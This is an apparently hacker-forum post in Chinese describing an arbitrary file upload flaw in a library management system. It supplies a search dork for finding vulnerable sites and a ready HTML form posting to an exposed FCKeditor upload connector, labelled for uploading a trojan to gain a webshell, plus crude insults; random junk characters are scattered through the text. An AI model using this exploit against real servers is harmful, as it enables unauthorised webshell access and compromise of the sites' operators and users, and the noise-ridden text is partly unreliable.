主题:图书馆系统任意文件上传漏洞5 M: E3 x4 c1 @
作者:冰锋刺客
4 r1 k0 ?( ?$ `( K# [, ]# h: l( Q 厂商:点击书(dianjishu.com)1 Z) U+ k6 a; `' K
日期:2012-6-21) s6 S0 N5 ^3 Y' J# l& a, _
$ Z M( p7 z% t5 G$ G/ k/ c7 D
I 概述
u/ p" [( X; b0 n9 \+ H4 A 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell8 F* {) i$ k: h
II 简介/ C7 f7 ?( n* d) i, b# c/ M
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"7 t! w) p! G. H" U# X9 P2 ~
补充一个漏洞4 q0 s) I: Z$ J
<form id="frmUpload" enctype="multipart/form-data"
' U8 W6 u! i/ c- Z& f action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>4 b. T# @, U, x( f; C( c
<input id="btnUpload" type="submit" value="操翻他">9 a- `6 O+ }4 A7 d6 {/ n
</form>. k- Q! X5 O. C9 ?! W
你们懂的1 m3 `& V& w4 |2 a' o- m# W7 C
那傻逼提供还需要改包.
) B8 E# y, t! ]# }2 c 自己看了下源代码发现fckeditor
8 d G* q' h0 ? 直接秒杀/ }; I+ p4 m. h0 d/ _/ k
|